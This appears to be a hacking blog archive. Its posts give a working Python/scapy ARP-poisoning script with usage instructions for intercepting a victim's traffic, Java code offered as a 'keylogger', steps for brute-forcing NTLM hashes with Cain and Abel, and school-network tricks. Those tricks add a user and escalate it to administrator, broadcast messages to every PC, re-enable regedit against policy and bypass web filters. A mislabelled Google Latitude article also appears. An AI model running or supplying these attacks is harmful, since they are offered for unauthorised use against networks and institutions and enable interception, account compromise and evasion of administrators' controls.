Sunday, August 30, 2015

ARP poisioning using python

Heres the source for ARP poisioning using python

from scapy.all import *
import argparse
import signal
import sys
import logging
import time
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--victimIP", help="Choose the victim IP address. Example: -v 192.168.0.5")
parser.add_argument("-r", "--routerIP", help="Choose the router IP address. Example: -r 192.168.0.1")
return parser.parse_args()
def originalMAC(ip):
ans,unans = srp(ARP(pdst=ip), timeout=5, retry=3)
for s,r in ans:
return r[Ether].src
def poison(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
def restore(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
sys.exit("Restored!")
def main(args):
if os.geteuid() != 0:
sys.exit("Need Permission!")
routerIP = args.routerIP
victimIP = args.victimIP
routerMAC = originalMAC(args.routerIP)
victimMAC = originalMAC(args.victimIP)
if routerMAC == None:
sys.exit("Could not find router MAC address!")
if victimMAC == None:
sys.exit("Could not find victim MAC address!")
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('1\n')
def signal_handler(signal, frame):
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('0\n')
restore(routerIP, victimIP, routerMAC, victimMAC)
signal.signal(signal.SIGINT, signal_handler)
while 1:
poison(routerIP, victimIP, routerMAC, victimMAC)
time.sleep(1.5)
main(parse_args())

Example usage:

python arpspoof.py -v 192.168.0.275 -r 192.168.0.1

In order to run this script you’ll need to copy it into a text file locally, then give it two the two arguments it desires; victim IP and router IP. Make sure you run as root. As it stands scapy’s conf.verb variable is set to 1 which means it’ll output all the things that it’s doing so every time it sends a spoofed packet it’ll output that to the terminal. To remove this just set conf.verb=0 at the beginning of the script like perhaps after the logging.getLogger() part.

Install Scapy for python Click here

Thursday, July 3, 2014

Java KeyLogger - Free Source code

import java.awt.event.KeyEvent;
import java.awt.event.KeyListener;
import java.io.*;
import java.util.*;
import javax.swing.JFrame;
import javax.swing.JTextField;

public class KeyEventDemo{

public static void main(String[] args) throws IOException{

JFrame aWindow = new JFrame("This is the Window Title");

aWindow.setBounds(0,0,0,0);
aWindow.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

JTextField typingArea = new JTextField(20);
typingArea.addKeyListener(new KeyListener() {

public void files (String s) {
try(PrintWriter o = new PrintWriter(new BufferedWriter(new FileWriter("odi.txt", true)))) {
o.println(s);
}catch (IOException e) {
System.out.println("Fucked");
}
}

public void keyTyped(KeyEvent e) {
displayInfo(e, "KEY TYPED: ");
}

public void keyPressed(KeyEvent e) {
//displayInfo(e, "KEY PRESSED: ");
}

public void keyReleased(KeyEvent e) {
//displayInfo(e, "KEY RELEASED: ");
}

protected void displayInfo(KeyEvent e, String s) {
String modString, tmpString, actionString, locationString;
String keyString;
int id = e.getID();
if (id == KeyEvent.KEY_TYPED) {
char c = e.getKeyChar();

keyString = String.valueOf(c);
} else {
int keyCode = e.getKeyCode();
keyString = "key code = " + keyCode + " (" + KeyEvent.getKeyText(keyCode) + ")";
}

int modifiers = e.getModifiersEx();
modString = "modifiers = " + modifiers;
tmpString = KeyEvent.getModifiersExText(modifiers);
if (tmpString.length() > 0) {
modString += " (" + tmpString + ")";
} else {
modString += " (no modifiers)";
}

actionString = "action key? ";
if (e.isActionKey()) {
actionString += "YES";
} else {
actionString += "NO";
}

locationString = "key location: ";
int location = e.getKeyLocation();
if (location == KeyEvent.KEY_LOCATION_STANDARD) {
locationString += "standard";
} else if (location == KeyEvent.KEY_LOCATION_LEFT) {
locationString += "left";
} else if (location == KeyEvent.KEY_LOCATION_RIGHT) {
locationString += "right";
} else if (location == KeyEvent.KEY_LOCATION_NUMPAD) {
locationString += "numpad";
} else { // (location == KeyEvent.KEY_LOCATION_UNKNOWN)
locationString += "unknown";
}
//System.out.println(keyString);

//System.out.println(modString);
//System.out.println(actionString);
//System.out.println(locationString);
files(keyString);

}

});

aWindow.add(typingArea);
aWindow.setVisible(true);

}
}

Tuesday, May 6, 2014

Java Keylogger

Record the Keystrokes using Java.

/** KeyEvent.java */
import java.io.*;
import javax.swing.JFrame;
import javax.swing.JTextField;
import java.awt.event.KeyEvent;
import java.awt.event.KeyListener;

public class KeyEvent {
public static void main(String[] args) throws IOException{
    JFrame aWindow = new JFrame("This is the Window Title");

    aWindow.setBounds(0,0,0,0);
    aWindow.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

    JTextField typingArea = new JTextField(20);
    typingArea.addKeyListener(new KeyListener() {

      public void keyTyped(KeyEvent e) {
        displayInfo(e, "KEY TYPED: ");
      }

      public void keyPressed(KeyEvent e) {
        //displayInfo(e, "KEY PRESSED: ");
      }

      public void keyReleased(KeyEvent e) {
        //displayInfo(e, "KEY RELEASED: ");
      }

      protected void displayInfo(KeyEvent e, String s) {
        String keyString, modString, tmpString, actionString, locationString;
        int id = e.getID();
        if (id == KeyEvent.KEY_TYPED) {
          char c = e.getKeyChar();
          keyString = "key character = '" + c + "'";
        } else {
          int keyCode = e.getKeyCode();
          keyString = "key code = " + keyCode + " (" + KeyEvent.getKeyText(keyCode) + ")";
        }

        int modifiers = e.getModifiersEx();
        modString = "modifiers = " + modifiers;
        tmpString = KeyEvent.getModifiersExText(modifiers);
        if (tmpString.length() > 0) {
          modString += " (" + tmpString + ")";
        } else {
          modString += " (no modifiers)";
        }

        actionString = "action key? ";
        if (e.isActionKey()) {
          actionString += "YES";
        } else {
          actionString += "NO";
        }

        locationString = "key location: ";
        int location = e.getKeyLocation();
        if (location == KeyEvent.KEY_LOCATION_STANDARD) {
          locationString += "standard";
        } else if (location == KeyEvent.KEY_LOCATION_LEFT) {
          locationString += "left";
        } else if (location == KeyEvent.KEY_LOCATION_RIGHT) {
          locationString += "right";
        } else if (location == KeyEvent.KEY_LOCATION_NUMPAD) {
          locationString += "numpad";
        } else { // (location == KeyEvent.KEY_LOCATION_UNKNOWN)
          locationString += "unknown";
        }

        System.out.println(keyString);
        System.out.println(modString);
        System.out.println(actionString);
        System.out.println(locationString);
    System.out.println();
      }

    });
    aWindow.add(typingArea);
    aWindow.setVisible(true);


}
}

Full KeyLogger will be updated soon...
Stay In touch with Us...!!! Happie Hacking.. :) :p

Monday, July 15, 2013

hack mobile phones

How Tracing a Mobile Phone Location With Google Latitude Works

The cool thing about Google Latitude is that there are really no fancy, expensive gadgets required. All you need is a mobile phone and you can build what’s essentially a GPS network of friends, without the need for GPS technology. Wondering whether your buddy Jim is still at work? Just log onto Google Latitude, or check Google Maps on your phone, and sure enough, Jim’s icon shows up on the map where he works. Did your best friend go missing after her date the other night? If she left her phone on, all of her friends can check out where she’s currently located.
The potential uses of this technology are amazing, and Google is just getting started by integrated it’s cellular triangulation technology with Google Maps. MakeUseOf authors previously covered similar applications, such as NavXS and BuddyWay. However, BuddyWay requires that the phone or PDA is GPS enabled. The convenience of Google Latitude is that you don’t need GPS, and it’ll work on almost any mobile phone that can use Google Maps. According to Google, these include Android-powered devices, iPhone, BlackBerry, Windows Mobile 5.0+ and Symbian.

Setting it up is as easy as typing your phone number into the entry field on the Google Latitude main page, or you can visit “google.com/latitude” with your mobile device and install it directly. It’s basically the latest version of Google Maps with Latitude embedded. Once you’ve installed this version on your phone, you’re good to go – just click on “Menu” and then “Latitude.”

Setting Up Google Latitude With a Network of Friends

Setting up the application on your mobile device is a piece of cake. Once you open Latitude on your phone, you can immediately start adding friends with their email address. If none of your friends have Latitude installed on their phones yet, forward them this article and tell them to install it!

When you first fire up the map after you’ve enabled Latitude with your profile, you’ll immediately see your regular Google map pointer replaced by your picture icon, email address and your location the last time your device was polled.

This is cool and everything, and as I outlined in a previous MakeUseOf article on Google Maps, this application does a great job keeping the map updated with your status within a certain radius, depending on where the nearest cell towers are. However, while keeping track of yourself on the map while you’re driving or walking around town is fun, it can get pretty boring when you’re doing it alone. Latitude lets you have a little bit of fun with your network of friends by letting you add each of them to your Latitude “friends” list so that you can see their locations too. To test this feature, I called up a friend of mine with a Blackberry down in Derry, New Hampshire, and asked him to fire up Latitude and add me as a friend. Once we confirmed each other as friends, I instantly showed up on his map and he showed up on mine!

When you click on your friend’s icon, you can see their contact and location information, or you can choose how you want to share your own information with this specific friend. This means that you can pick and choose the level of privacy that you want for your own status updates based on individual friends. You can provide your exact location to your best friend, while keeping your details somewhat vague for your parents. Also, within the Latitude menu, you can set your privacy level for everyone across the board.

You can toggle your privacy settings back and forth, so that when you’re somewhere that you don’t want anyone to know about, you just flip your status to “Hide your location.” When you’re back where you’re supposed to be, you just flip your privacy back to “Detect your location.” If you want to fool your friends (or your boss) into thinking that you’re somewhere you’re not, you can manually set your location.

Using Google Latitude Online

Of course, tracing a mobile phone location isn’t enough for Google. This is the part that really made me raise my eyebrows. Google has incorporated this mobile technology into an online gadget that you can view and manipulate from your iGoogle page.

This means that even if you don’t have your mobile phone with you, but you have access to the Internet, you can check out where all of your friends are at the moment, or update your own location on Latitude so that they know where you are. This whole concept takes the whole architecture and intent of Twitter and adds another entire level of graphical interactivity to it, with visual, real-time status updates for your friends. The next evolution of this technology that I envision is the ability to embed a Google Latitude widget in your blog or web page that allows you to share your own Latitude location information with your readers. Since the status bar already exists for short text updates, this feature would turn Google Latitude into a more graphical version of Twitter.
Have you ever used any of the latest “friend tracking” mobile phone technologies for tracing a mobile phone location? Which one is your favorite? Share your opinion in the comments section below.

Friday, July 5, 2013

Hack password using Hash

How to Hack Password using Cain and Abel

First Download Cain and Abel Software.

Open cain and abel click on cracker option.
How to Hack Password using Cain and Abel

Select LM & NTLM Hashes and click “+” sign

How to Hack Password using Cain and Abel

Click on Next
How to Hack Password using Cain and Abel

I want to recover password of “raaz” user name then right click on raaz> Brute Force Attack > NTLM Hashes.
How to Hack Password using Cain and Abel

Now you will see window similar to below image. Click on start.
How to Hack Password using Cain and Abel

After successfully finished performing password recovery it will show you password like in the image below.
How to Hack Password using Cain and Abel

Friday, April 12, 2013

Hack wifi using command prompt

HACKING UR COLLEGE OR SCHOOL PC TO BYPASS WEBFILTER AND TO SEND A MESSAGE TO ALL OTHER PC

Open command prompt from where it is Banned

Open up Command Prompt (Start>Run>Command.com)

IF U Can't use command prompt at your school?

Open up Microsoft word..Type:

Command.com

Then save it as Somthing.bat.

Warning: Make sure you delete the file because if the admin finds out your in big trouble.

--Adding a user to your network--

Type:

Net user Hacker /ADD

-----

That will add "Hacker" onto the school user system.

-----

Now you added users lets delete them!

Type: Net user Hacker /DELETE

Warning: Be carefull it deletes all their files.

-----

"Hacker" will be deleted from the user system.

-----

if It says access denied

it's because your not admin!

----

Now lets make your Admin!

----

This will make Hacker an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

Type: net localgroup

It will show you what they call admin, say at my school they calll it

adminstrator so then i would

Type: net localgroup administrator Hacker /ADD

----

Getting past your web filter.

Easy way: Type whatever you want to go on say i wanted to go on miniclips bug on wire i would go to google and search miniclip bug on wire

then instead of clicking the link i would click "cached".

Hard way: I'm hoping you still have command prompt open.

Type: ping miniclip.com

And then you should get a IP type that out in your web browser, and don't forget to put "http://" before you type the IP.

-----

Sending messages throught your school server

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send * "The server is h4x0r3d"

Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out.

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Hacker School * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"

use commas to divide the names and NO SPACES between them.

or

Allowing dos and regedit in a restricted Windows

open notepad and type the following:

REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]

"Disabled"=dword:0

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]

"DisableRegistryTools"=dword:0

Save it as something.reg then run it

Wednesday, March 13, 2013

unblock youtube

According to trap17.com this is how you access the internet:
1. Create a new text file that says: @start "" /b "C:\Program Files\Internet Explorer\iexplore.exe" %*
2. Rename the file "e.bat"
3. Copy this file to your profile folder
4. Open a command prompt window and type "e" followed by a URL of a website you want to go to. For example, if you wanted to go to Mahalo you would type (without the quotes): "e www.mahalo.com"
I haven't tried this myself, so hopefully it works.

To unblock websites try http://www.mathtunnel.com/ apparently at this site you can just type in the url of any website you want to unlock. No command prompt necessary.
Or you can try these two command prompt tricks from http://revision3.com/forum/showthread.php?t=4885
Trick 1: (In this example www.mahalo.com stands for the url of the website you want to unblock.)
1. Open the command prompt
2. Type: ping www.mahalo.com
3. Copy the IP next to "Reply From"
4. Paste the IP into your address bar.

Trick 2: (In this example www.mahalo.com stands for the url of the website you want to unblock.)
1. Open command prompt and notepad.
2. Write "ping localhost" without the "" into the command prompt.
3. Copy the IP into the notepad file, hit tab and write localhost
4. In the command prompt write: ping www.mahalo.com
5- Copy the IP of the site into the notepad file, hit tab and write the link to the site, without http://, as in "www.google.com"
6- Hit enter and repeat step 5, should look like this
00.00.0.00 localhost
000.000.00.00 www.website.com
000.000.00.00 www.website.com

7. Save the notepad file into your desktop as "host."
8. Go to My Computer>Your Hardrive>WINDOWS>system32>drivers>ect and drag the notepad file into that folder.

Just in case those tips don't work, I also found you a couple video tutorials:
YouTube: Unblock that blocked site!